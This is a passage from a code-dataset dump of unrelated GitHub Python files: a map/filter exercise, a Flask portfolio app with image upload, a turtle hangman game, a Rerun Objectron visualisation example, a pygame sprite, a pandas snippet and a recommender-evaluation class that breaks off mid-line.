confusedCase to a list confusedList\n# # ----- Your Code Starts Here -----\nconfusedList = list(confusedCase)\n\n\n# # ---- Task 2d ----\n# # Write a lambda function that does the exact thing as flippingCase, and use it in the map function\n# # Store the result in confusedCaseAgain\n# # HINT : Think about how you had written if in list comprehensions\n# # ----- Your Code Starts Here -----\nconfused = (lambda x: x.lower() if x.isupper() else x.upper())\nconfusedCaseAgain = map(confused, 'I Am Camel Case')\nprint (confusedCaseAgain == confusedCase)\n\n# # ---- Task 2e ----\n# # Cast confusedCaseAgain to a list confusedListAgain\n# # ----- Your Code Starts Here -----\nconfusedListAgain = list(confusedCaseAgain)\n# # ---- Task 3a ----\n# # Time to do some filtering!\n# # Filter function takes same parameters as map function - a function object and a sequence\n# # First write a function lowercaseOnly that returns a character only if it is lowercase, else returns None\n# # ----- Your Code Starts Here -----\n\ndef lowercaseonly(x):\n\tif x.islower():\n\t\treturn x\n\telse:\n\t\treturn None\t\n\n\n# # ---- Task 3b ----\n# # Use function lowercaseOnly and confusedListAgain as parameters of filter function\n# # and filter all lowercase letters\n# # Store the result in lowercase_filter.\n# # ----- Your Code Starts Here -----\nlowercase_filter = map(lowercaseonly,confusedListAgain)\n\n# # ---- Task 3c ----\n# # Cast lowercase_filter to lowercase_list\n# # ----- Your Code Starts Here -----\nlowercase_list = list(lowercase_filter)\nprint (lowercase_list)\n\n# # ---- Task 3d ----\n# # Use lambda function to do the exact same thing as lowercaseOnly\n# # Use this function as a parameter in filter function\n# # Now instead of storing the result of filter function in a variable, cast it to list directly\n# # Assign the final list to variable lowercase_list_la\n# # ----- Your Code Starts Here -----\n# lowercase_list_la = []\n","repo_name":"miabonanno/RandomUploads","sub_path":"wee11_notests.py","file_name":"wee11_notests.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32586238500","text":"import os\nimport urllib.request\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom werkzeug.utils import secure_filename\nimport csv\n\napp = Flask(__name__)\n\n@app.route('/')\ndef return_home():\n return render_template(\"index.html\")\n\n@app.route('/about')\ndef return_about():\n return render_template(\"about.html\")\n\n@app.route('/index')\ndef return_index():\n return render_template(\"index.html\")\n\ndef return_users():\n with open('data/users.csv', mode='r') as file:\n data = csv.DictReader(file, delimiter=',')\n user = [] \n for row in data:\n user.append({\n \"fname\": row[\"firstName\"],\n \"lname\": row[\"lastName\"],\n \"bio\": row[\"bio\"],\n \"imgFile\": row[\"imgFile\"]\n })\n return user\n\n@app.route('/portfolio')\ndef return_form():\n users = []\n users = return_users()\n return render_template(\"portfolio.html\", users=users) \n\napp.config[\"IMAGE_UPLOADS\"] = '/Users/chantelngoh/Desktop/SBU/Github/JACT/static/images'\napp.config[\"ALLOWED_IMAGE_EXTENSIONS\"] = [\"PNG\", \"JPG\", \"JPEG\", \"GIF\"]\n\ndef allowed_image(filename):\n if not \".\" in filename:\n return False\n ext = filename.rsplit(\".\", 1)[1]\n if ext.upper() in app.config[\"ALLOWED_IMAGE_EXTENSIONS\"]:\n return True\n else:\n return False\n\n@app.route(\"/upload-image\", methods=[\"GET\", \"POST\"])\ndef upload_image():\n\n if request.method == \"POST\":\n if request.files:\n image = request.files[\"image\"]\n\n if image.filename == \"\":\n print(\"Image must have a filename\")\n return redirect(request.url)\n\n if not allowed_image(image.filename):\n print(\"That image extension is not allowed\")\n return redirect(request.url)\n\n else:\n filename = secure_filename(image.filename)\n image.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], filename))\n\n print(\"Image saved\")\n return redirect(request.url)\n\n return render_template(\"portfolio.html\")\n\n@app.route('/newUser', methods=[\"GET\", \"POST\"])\ndef new_form():\n if request.method == \"GET\":\n return redirect(url_for('newUser'))\n elif request.method == \"POST\":\n userdata = dict(request.form)\n fname = userdata[\"fname\"]\n lname = userdata[\"lname\"]\n bio = userdata[\"bio\"]\n lines = list()\n isTaken = False\n users = []\n\n with open('data/users.csv', mode='r') as readFile:\n reader = csv.DictReader(readFile, delimiter=',')\n for row in reader:\n lines.append(row)\n for r in range(len(lines)):\n if fname == lines[r][\"firstName\"] and lname == lines[r][\"lastName\"]:\n isTaken = True\n\n if( len(fname) < 1 or len(lname) < 1 or len(bio) < 1 ):\n users = return_users()\n return render_template(\"portfolio.html\", users=users, status='Please resubmit with valid information.') \n\n elif( isTaken == True ):\n users = return_users()\n return render_template(\"portfolio.html\", users=users, info='This name is already taken.') \n\n else:\n if request.files:\n image = request.files[\"image\"]\n if image.filename == \"\":\n users = return_users()\n return render_template(\"portfolio.html\", users=users, image_status='Please submit an image.') \n if not allowed_image(image.filename):\n users = return_users()\n return render_template(\"portfolio.html\", users=users, image_status='That image extension is not allowed.') \n else:\n filename = secure_filename(image.filename)\n ext = filename.rsplit(\".\", 1)[1]\n new_filename = fname + \"-\" + lname + \".\" + ext\n image.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], new_filename))\n\n with open('data/users.csv', mode='a', newline='') as file:\n data = csv.writer(file)\n data.writerow([fname, lname, bio,new_filename]) \n users = []\n users = return_users()\n return render_template(\"portfolio.html\", users=users) \n\n@app.route('/portfolio', methods=[\"GET\", \"POST\"])\ndef delete_form():\n if request.method == \"GET\":\n return render_template(\"portfolio.html\") \n elif request.method == \"POST\":\n userdata = dict(request.form)\n fullname = userdata[\"delete-btn\"] \n fname = fullname.rsplit(\"-\", 1)[0]\n lname = fullname.rsplit(\"-\", 1)[1]\n lines = list()\n with open('data/users.csv', mode='r') as readFile:\n reader = csv.DictReader(readFile, delimiter=',')\n for row in reader:\n lines.append(row)\n for r in range(len(lines)):\n if fname == lines[r][\"firstName\"] and lname == lines[r][\"lastName\"]:\n lines.remove(row)\n arrImages = os.listdir(app.config[\"IMAGE_UPLOADS\"])\n for img in arrImages:\n filename = img.rsplit(\".\", 1)[0]\n if filename == fullname:\n os.remove(app.config[\"IMAGE_UPLOADS\"] + '/' + img)\n\n with open('data/users.csv', mode='w') as writeFile:\n writer = csv.writer(writeFile) \n writer.writerow([\"firstName\", \"lastName\", \"bio\", \"imgFile\"]) \n for r in range(len(lines)):\n firstName = lines[r][\"firstName\"]\n lastName = lines[r][\"lastName\"]\n bio = lines[r][\"bio\"] \n imgFile = lines[r][\"imgFile\"] \n writer.writerow([firstName, lastName, bio, imgFile])\n users = []\n users = return_users() \n return render_template(\"portfolio.html\", users=users)\n\n@app.route('/open', methods=[\"GET\", \"POST\"])\ndef open_form():\n if request.method == \"GET\":\n return render_template(\"portfolio.html\") \n elif request.method == \"POST\":\n userdata = dict(request.form)\n fullname = userdata[\"open-btn\"] \n fname = fullname.rsplit(\"-\", 1)[0]\n lname = fullname.rsplit(\"-\", 1)[1] \n lines = list()\n with open('data/users.csv', mode='r') as readFile:\n reader = csv.DictReader(readFile, delimiter=',')\n for row in reader:\n lines.append(row)\n for r in range(len(lines)):\n if fname != lines[r][\"firstName\"] or lname != lines[r][\"lastName\"]:\n lines.remove(row)\n return render_template(\"user-page.html\", thisUser=lines)\n\nif __name__ == '__main__':\n app.run(debug = True)","repo_name":"amaraim22/JACT","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15647149947","text":"import turtle\nfrom random import shuffle\nimport unicodedata\nimport time\n\n\ndef nome_jogo(turtle):\n turtle.setpos(20,230)\n turtle.write('Jogo da Forca', font=('Arial',20,'bold'))\n turtle.home()\n\ndef desenho_forca(turtle, window_comprimento):\n coordenada_x1 = (window_comprimento/-2)+30\n turtle.setpos(coordenada_x1,-200)\n turtle.pendown()\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.right(90)\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.penup()\n coordenada_x2 = (window_comprimento/-2)+105\n turtle.setpos(coordenada_x2,-200)\n turtle.pendown()\n turtle.forward(250)\n turtle.right(90)#(-245,150)\n turtle.forward(100)\n turtle.right(90)#(-145,150)\n turtle.forward(25)\n turtle.penup()\n turtle.left(90)#(-145,125)\n turtle.home()\n\ndef desenho_cabeca (turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,25)\n turtle.left(180)\n turtle.pendown()\n turtle.fillcolor('yellow')\n turtle.begin_fill()\n turtle.circle(25)\n turtle.end_fill()\n turtle.fillcolor('black')\n turtle.penup()\n turtle.left(180)\n turtle.home()\n\ndef desenho_dorso(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(90)\n turtle.pendown()\n turtle.forward(80)\n turtle.penup()\n turtle.left(90)\n turtle.home()\n\ndef desenho_left_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(135)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(135)\n turtle.home()\n\ndef desenho_right_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(45)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(45)\n turtle.home()\n\ndef desenho_left_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(120)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(120)\n turtle.home()\n\ndef desenho_right_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(60)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(60)\n turtle.home()\n\ndef desenho_espacos(turtle, letras_palavra, window_comprimento):\n posicoes_letras = []\n espace = 0\n coordenada_x = (window_comprimento/2)-30\n turtle.setpos(coordenada_x,-225)\n turtle.left(180)\n turtle.pensize(3)\n for i in letras_palavra:\n if i == ' ':\n turtle.forward(35)\n posicoes_letras.append([turtle.pos(),i])\n espace += 1\n else:\n turtle.pendown()\n turtle.forward(30)\n turtle.penup()\n turtle.forward(5)\n posicoes_letras.append([turtle.pos(),i])\n turtle.pensize(5)\n turtle.left(180)\n turtle.home()\n posicoes_letras.reverse()\n return posicoes_letras, espace\n\ndef desenho_letras(turtle, palavra, posicoes_letras, escolha, window_comprimento, acertos):\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1] \n \n coordenada_x = (window_comprimento/-2)+erros*20\n index_acertos = []\n erro = 0\n t = 0\n\n if escolha in no_accent:\n for x,e in enumerate(no_accent):\n if escolha == e:\n index_acertos.append(x)\n else:\n None\n for i in index_acertos:\n if i in acertos:\n t += 1\n else:\n None\n while t != 0:\n index_acertos.pop()\n t -= 1\n for i in index_acertos:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n turtle.home()\n else:\n erro = 1\n turtle.setpos(coordenada_x+30,-255)\n turtle.write(escolha, font=('Arial',18,'bold'))\n turtle.home()\n return erro, index_acertos\n\ndef caneta_setup ():\n caneta.hideturtle()\n caneta.speed(100)\n caneta.penup()\n caneta.color('Black')\n caneta.pensize(5)\n\ndef setup_window(comprimento):\n if comprimento <= 500:\n comprimento += 80\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 500 and comprimento <= 650:\n comprimento += 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 650 and comprimento <= 800:\n comprimento -= 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 800 and comprimento <= 1000:\n comprimento -= 110\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n else:\n comprimento -= 250\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n\ndef body_maker(erros):\n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_left_leg(caneta, window.window_width())\n elif erros == 6:\n desenho_right_leg(caneta, window.window_width())\n caneta.setpos(-100,100)\n caneta.write('Você perdeu', font=('Arial',18,'bold'))\n caneta.setpos(-130,70)\n caneta.write('Número de erros: Todos', font=('Arial',14,'bold'))\n time.sleep(2)\n return True\n\ndef repor_desenho(turtle, posicoes_letras, acertos, erros):\n \n for i in acertos:\n if i == ' ':\n None\n else:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n turtle.home()\n \n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n desenho_left_leg(caneta, window.window_width())\n else:\n None\n\n\n'''\n-------------------------------------------------------------------------------\n'''\n\n\nwindow = turtle.Screen() # limite_x: +-330, Limite_y: +-270\nwindow.bgcolor('lightblue')\nwindow.title('Jogo da Forca')\n\n\ncaneta = turtle.Turtle()\ncaneta_setup()\n\nwhile True:\n lista_palavras = [] \n L = open('entrada.txt','r+',encoding='utf-8')\n\n for i in L.readlines():\n s = i.lower().strip()\n if s == '':\n None\n else:\n lista_palavras.append(s)\n L.close()\n \n \n \n while lista_palavras != []:\n \n shuffle(lista_palavras)\n palavra = lista_palavras[int(len(lista_palavras)/2)]\n del lista_palavras[int(len(lista_palavras)/2)]\n \n letras_palavra = [] \n \n for i in palavra:\n letras_palavra.append(i)\n letras_palavra.reverse()\n \n comprimento = (len(letras_palavra)*35)*2\n \n setup_window(comprimento)\n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n \n \n escolha = ''\n erros = 0\n acertos = []\n \n posicoes_letras,e = desenho_espacos(caneta, letras_palavra, window.window_width())\n for i in range(e):\n acertos.append(' ')\n \n while True:\n palpite = window.textinput('','Escolha uma letra ou chute a palavra')\n \n \n if palpite == None:\n caneta.setpos(-175,100)\n caneta.write('Jogador desistiu. Volte sempre.', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n else:\n escolha = palpite.lower()\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1]\n if escolha == no_accent or escolha == palavra:\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n caneta.setpos(-100,70)\n caneta.write('Número de erros: {0}'.format(erros), font=('Arial',14,'bold'))\n time.sleep(2)\n decisao = window.textinput('Jogo da Forca','Quer conticuar? (responda sim ou nâo)')\n if decisao == 'sim':\n break\n else:\n palpite = None\n break\n elif escolha.isalpha() and len(escolha) == 1:\n middle = str(unicodedata.normalize('NFKD',escolha).encode('ASCII','ignore'))\n escolha_no_accent = middle[2:len(middle)-1]\n \n s,a = desenho_letras(caneta, palavra, posicoes_letras, escolha_no_accent, window.window_width(), acertos)\n \n erros += s\n \n if a == []:\n None\n else:\n for i in a:\n acertos.append(i)\n print(acertos)\n print()\n \n p = body_maker(erros)\n if p == True:\n decisao = window.textinput('Jogo da Forca','Quer conticuar? (responda sim ou nâo)')\n if decisao == 'sim':\n break\n else:\n palpite = None\n break\n \n \n if len(acertos) == len(palavra):\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n caneta.setpos(-100,70)\n caneta.write('Número de erros: {0}'.format(erros), font=('Arial',14,'bold'))\n time.sleep(2)\n decisao = window.textinput('Jogo da Forca','Quer conticuar? (responda sim ou nâo)')\n if decisao == 'sim':\n break\n else:\n palpite = None\n break\n else:\n caneta.setpos(-95,100)\n caneta.write('Escolha Inválida.', font=('Arial',18,'bold'))\n time.sleep(2)\n caneta.reset()\n caneta_setup()\n \n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n desenho_espacos(caneta, letras_palavra, window.window_width())\n repor_desenho(caneta, posicoes_letras, acertos, erros)\n caneta.reset()\n window.reset()\n caneta_setup()\n if palpite == None:\n caneta.setpos(-95,0)\n caneta.write('Clique para Sair', font=('Arial',18,'bold'))\n caneta.home()\n break\n if palpite == None:\n break\nwindow.exitonclick()\n","repo_name":"IgneousGuikas/RodrigoGikas_EP2","sub_path":"Exercicio Jogo da Forca(10).py","file_name":"Exercicio Jogo da Forca(10).py","file_ext":"py","file_size_in_byte":12228,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12991151451","text":"#!/usr/bin/env python3\n\"\"\"\nExample of using the Rerun SDK to log the Objectron dataset.\n\nExample: `examples/python/objectron/main.py --recording chair`\n\"\"\"\nfrom __future__ import annotations\n\nimport argparse\nimport logging\nimport math\nimport os\nimport sys\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Iterable, Iterator\n\nimport numpy as np\nimport numpy.typing as npt\nimport rerun as rr # pip install rerun-sdk\nfrom download_dataset import (\n ANNOTATIONS_FILENAME,\n AVAILABLE_RECORDINGS,\n GEOMETRY_FILENAME,\n IMAGE_RESOLUTION,\n LOCAL_DATASET_DIR,\n ensure_recording_available,\n)\nfrom proto.objectron.proto import ARCamera, ARFrame, ARPointCloud, FrameAnnotation, Object, ObjectType, Sequence\nfrom scipy.spatial.transform import Rotation as R\n\n\n@dataclass\nclass SampleARFrame:\n \"\"\"An `ARFrame` sample and the relevant associated metadata.\"\"\"\n\n index: int\n timestamp: float\n dirpath: Path\n frame: ARFrame\n image_path: Path\n\n\ndef read_ar_frames(\n dirpath: Path, num_frames: int, run_forever: bool, per_frame_sleep: float\n) -> Iterator[SampleARFrame]:\n \"\"\"\n Loads up to `num_frames` consecutive ARFrames from the given path on disk.\n\n `dirpath` should be of the form `dataset/bike/batch-8/16/`.\n \"\"\"\n\n path = dirpath / GEOMETRY_FILENAME\n print(f\"loading ARFrames from {path}\")\n\n time_offset = 0\n frame_offset = 0\n\n while True:\n frame_idx = 0\n data = Path(path).read_bytes()\n while len(data) > 0 and frame_idx < num_frames:\n next_len = int.from_bytes(data[:4], byteorder=\"little\", signed=False)\n data = data[4:]\n\n frame = ARFrame().parse(data[:next_len])\n img_path = Path(os.path.join(dirpath, f\"video/{frame_idx}.jpg\"))\n yield SampleARFrame(\n index=frame_idx + frame_offset,\n timestamp=frame.timestamp + time_offset,\n dirpath=dirpath,\n frame=frame,\n image_path=img_path,\n )\n\n data = data[next_len:]\n frame_idx += 1\n\n if run_forever and per_frame_sleep > 0.0:\n time.sleep(per_frame_sleep)\n\n if run_forever:\n time_offset += frame.timestamp\n frame_offset += frame_idx\n else:\n break\n\n\ndef read_annotations(dirpath: Path) -> Sequence:\n \"\"\"\n Loads the annotations from the given path on disk.\n\n `dirpath` should be of the form `dataset/bike/batch-8/16/`.\n \"\"\"\n\n path = dirpath / ANNOTATIONS_FILENAME\n print(f\"loading annotations from {path}\")\n data = Path(path).read_bytes()\n\n seq = Sequence().parse(data)\n\n return seq\n\n\ndef log_ar_frames(samples: Iterable[SampleARFrame], seq: Sequence) -> None:\n \"\"\"Logs a stream of `ARFrame` samples and their annotations with the Rerun SDK.\"\"\"\n\n rr.log(\"world\", rr.ViewCoordinates.RIGHT_HAND_Y_UP, timeless=True)\n\n log_annotated_bboxes(seq.objects)\n\n frame_times = []\n for sample in samples:\n rr.set_time_sequence(\"frame\", sample.index)\n rr.set_time_seconds(\"time\", sample.timestamp)\n frame_times.append(sample.timestamp)\n\n rr.log(\"world/camera\", rr.ImageEncoded(path=sample.image_path))\n log_camera(sample.frame.camera)\n log_point_cloud(sample.frame.raw_feature_points)\n\n log_frame_annotations(frame_times, seq.frame_annotations)\n\n\ndef log_camera(cam: ARCamera) -> None:\n \"\"\"Logs a camera from an `ARFrame` using the Rerun SDK.\"\"\"\n\n X = np.asarray([1.0, 0.0, 0.0])\n Z = np.asarray([0.0, 0.0, 1.0])\n\n world_from_cam = np.asarray(cam.transform).reshape((4, 4))\n translation = world_from_cam[0:3, 3]\n intrinsics = np.asarray(cam.intrinsics).reshape((3, 3))\n rot = R.from_matrix(world_from_cam[0:3, 0:3])\n (w, h) = (cam.image_resolution_width, cam.image_resolution_height)\n\n # Because the dataset was collected in portrait:\n swizzle_x_y = np.asarray([[0, 1, 0], [1, 0, 0], [0, 0, 1]])\n intrinsics = swizzle_x_y @ intrinsics @ swizzle_x_y\n rot = rot * R.from_rotvec((math.tau / 4.0) * Z)\n (w, h) = (h, w)\n\n rot = rot * R.from_rotvec((math.tau / 2.0) * X) # TODO(emilk): figure out why this is needed\n\n rr.log(\n \"world/camera\",\n rr.Transform3D(translation=translation, rotation=rr.Quaternion(xyzw=rot.as_quat())),\n )\n rr.log(\n \"world/camera\",\n rr.Pinhole(\n resolution=[w, h],\n image_from_camera=intrinsics,\n camera_xyz=rr.ViewCoordinates.RDF,\n ),\n )\n\n\ndef log_point_cloud(point_cloud: ARPointCloud) -> None:\n \"\"\"Logs a point cloud from an `ARFrame` using the Rerun SDK.\"\"\"\n\n positions = np.array([[p.x, p.y, p.z] for p in point_cloud.point]).astype(np.float32)\n identifiers = point_cloud.identifier\n rr.log(\"world/points\", rr.Points3D(positions, instance_keys=identifiers, colors=[255, 255, 255, 255]))\n\n\ndef log_annotated_bboxes(bboxes: Iterable[Object]) -> None:\n \"\"\"Logs all the bounding boxes annotated in an `ARFrame` sequence using the Rerun SDK.\"\"\"\n\n for bbox in bboxes:\n if bbox.type != ObjectType.BOUNDING_BOX:\n print(f\"err: object type not supported: {bbox.type}\")\n continue\n\n rot = R.from_matrix(np.asarray(bbox.rotation).reshape((3, 3)))\n rr.log(\n f\"world/annotations/box-{bbox.id}\",\n rr.Boxes3D(\n half_sizes=0.5 * np.array(bbox.scale),\n centers=bbox.translation,\n rotations=rr.Quaternion(xyzw=rot.as_quat()),\n colors=[160, 230, 130, 255],\n labels=bbox.category,\n ),\n timeless=True,\n )\n\n\ndef log_frame_annotations(frame_times: list[float], frame_annotations: list[FrameAnnotation]) -> None:\n \"\"\"Maps annotations to their associated `ARFrame` then logs them using the Rerun SDK.\"\"\"\n\n for frame_ann in frame_annotations:\n frame_idx = frame_ann.frame_id\n if frame_idx >= len(frame_times):\n continue\n\n time = frame_times[frame_idx]\n rr.set_time_sequence(\"frame\", frame_idx)\n rr.set_time_seconds(\"time\", time)\n\n for obj_ann in frame_ann.annotations:\n keypoint_ids = [kp.id for kp in obj_ann.keypoints]\n keypoint_pos2s = np.asarray([[kp.point_2d.x, kp.point_2d.y] for kp in obj_ann.keypoints], dtype=np.float32)\n # NOTE: These are normalized points, so we need to bring them back to image space\n keypoint_pos2s *= IMAGE_RESOLUTION\n\n if len(keypoint_pos2s) == 9:\n log_projected_bbox(f\"world/camera/estimates/box-{obj_ann.object_id}\", keypoint_pos2s)\n else:\n for id, pos2 in zip(keypoint_ids, keypoint_pos2s):\n rr.log(\n f\"world/camera/estimates/box-{obj_ann.object_id}/{id}\",\n rr.Points2D(pos2, colors=[130, 160, 250, 255]),\n )\n\n\n# TODO(#3412): replace once we can auto project 3D bboxes on 2D views (need blueprints)\ndef log_projected_bbox(path: str, keypoints: npt.NDArray[np.float32]) -> None:\n \"\"\"\n Projects the 3D bounding box to a 2D plane, using line segments.\n\n The 3D bounding box is described by the keypoints of an `ObjectAnnotation`\n \"\"\"\n # fmt: off\n segments = np.array([[keypoints[1], keypoints[2]],\n [keypoints[1], keypoints[3]],\n [keypoints[4], keypoints[2]],\n [keypoints[4], keypoints[3]],\n\n [keypoints[5], keypoints[6]],\n [keypoints[5], keypoints[7]],\n [keypoints[8], keypoints[6]],\n [keypoints[8], keypoints[7]],\n\n [keypoints[1], keypoints[5]],\n [keypoints[2], keypoints[6]],\n [keypoints[3], keypoints[7]],\n [keypoints[4], keypoints[8]]], dtype=np.float32)\n # fmt: on\n rr.log(path, rr.LineStrips2D(segments, colors=[130, 160, 250, 255]))\n\n\ndef main() -> None:\n # Ensure the logging in download_dataset.py gets written to stderr:\n logging.getLogger().addHandler(logging.StreamHandler())\n logging.getLogger().setLevel(\"INFO\")\n\n parser = argparse.ArgumentParser(description=\"Logs Objectron data using the Rerun SDK.\")\n parser.add_argument(\n \"--frames\", type=int, default=sys.maxsize, help=\"If specified, limits the number of frames logged\"\n )\n parser.add_argument(\"--run-forever\", action=\"store_true\", help=\"Run forever, continually logging data.\")\n parser.add_argument(\n \"--per-frame-sleep\", type=float, default=0.1, help=\"Sleep this much for each frame read, if --run-forever\"\n )\n parser.add_argument(\n \"--recording\",\n type=str,\n choices=AVAILABLE_RECORDINGS,\n default=AVAILABLE_RECORDINGS[1],\n help=\"The objectron recording to log to Rerun.\",\n )\n parser.add_argument(\n \"--force-reprocess-video\",\n action=\"store_true\",\n help=\"Reprocess video frames even if they already exist\",\n )\n parser.add_argument(\n \"--dataset_dir\", type=Path, default=LOCAL_DATASET_DIR, help=\"Directory to save example videos to.\"\n )\n\n rr.script_add_args(parser)\n args = parser.parse_args()\n\n rr.script_setup(args, \"rerun_example_objectron\")\n\n dir = ensure_recording_available(args.recording, args.dataset_dir, args.force_reprocess_video)\n\n samples = read_ar_frames(dir, args.frames, args.run_forever, args.per_frame_sleep)\n seq = read_annotations(dir)\n log_ar_frames(samples, seq)\n\n rr.script_teardown(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rerun-io/rerun","sub_path":"examples/python/objectron/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9702,"program_lang":"python","lang":"en","doc_type":"code","stars":3502,"dataset":"github-code","pt":"38"} +{"seq_id":"37953124818","text":"#Name of File: damagetext.py\n#Purpose: Implements text of fight that shows that a hit has been landed and decreased the health of one of the in-game sprites\n#Version and Date: Version 1, last updated March 2021\n#Author(s): Ashton Foster\n#Dependencies: pygame\n\nimport pygame\n\nclass DamageText(pygame.sprite.Sprite):\n def __init__(self, x, y, damage, color):\n pygame.sprite.Sprite.__init__(self)\n self.font = pygame.font.Font(None, 35) #setting font\n self.image = self.font.render(damage, True, color)\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n self.counter = 0\n\n def getCounter(self):\n return self.counter\n\n def update(self):\n # move damage text\n self.rect.y -= 1\n # delete text after time\n self.counter += 1\n if self.counter > 25:\n self.kill()\n","repo_name":"rmoroz20/Klassic-Karole-CI102-103-Project","sub_path":"damagetext.py","file_name":"damagetext.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39412154002","text":"import pandas as pd\nimport numpy as np\n\nwith open('TestLog.txt') as file:\n i=0\n data=[]\n for line in file:\n s=line.split()\n data.append(s)\ndata_df = pd.DataFrame(data)\ndata_df.columns= ['Distance','Vertical','Horizontal']\ndata_df\n","repo_name":"wittyatom/DataMining","sub_path":"datacleaningsample.py","file_name":"datacleaningsample.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70087434990","text":"import numpy as np\r\nimport pandas as pd\r\nimport math\r\n\r\nclass EVALUATION():\r\n\r\n def __init__(self,estimated_rating_matrix, recommmendation_size, recommendation_list, train_dataset, valid_items, test_dataset):\r\n self.recommendation_size = recommmendation_size\r\n self.estimated_rating_matrix = estimated_rating_matrix\r\n self.recommendation_list = recommendation_list\r\n self.train_dataset = train_dataset\r\n self.test_dataset = test_dataset\r\n self.valid_items = valid_items\r\n\r\n self.user_size = len(self.recommendation_list.keys())\r\n\r\n def MERICS_01(self):\r\n self.avi_test_dataset_size = 0\r\n self.total_hits = 0\r\n self.total_NDCG = 0\r\n self.total_abs_deviation_of_ratings = 0\r\n self.total_square_deviation_of_ratings = 0\r\n\r\n for row in self.test_dataset.iloc():\r\n if row[0] in self.recommendation_list.keys() and row[1] in self.valid_items: # 修复BUG:别忘了item也必须要在训练集中出现过才行哦!\r\n self.avi_test_dataset_size += 1\r\n if row[1] in self.recommendation_list[row[0]].values:\r\n self.total_hits += 1\r\n list_for_this_user = self.recommendation_list[row[0]].values.tolist()\r\n posi = list_for_this_user.index(row[1])\r\n self.total_NDCG += np.reciprocal(np.log2(posi + 2)) # np.reciprocal()函数返回参数逐元素的倒数(这里+2是因为索引位置从0开始的吧,否则会出现分母=log2(1)=0的情况)\r\n\r\n # 修复BUG:下面这里还要算上没有命中的那一部分!如果只算命中的,当然误差很小啦!!\r\n self.total_abs_deviation_of_ratings += abs(self.estimated_rating_matrix.loc[row[0],row[1]] - row[2])\r\n self.total_square_deviation_of_ratings += (self.estimated_rating_matrix.loc[row[0],row[1]] - row[2])**2\r\n\r\n self.Precision = self.total_hits / (self.recommendation_size * self.user_size)\r\n self.HR = self.total_hits / self.avi_test_dataset_size\r\n self.MAE = self.total_abs_deviation_of_ratings / self.avi_test_dataset_size\r\n self.RMSE = math.sqrt(self.total_square_deviation_of_ratings / self.avi_test_dataset_size)\r\n self.NDCG = self.total_NDCG / self.avi_test_dataset_size\r\n\r\n return self.Precision, self.HR, 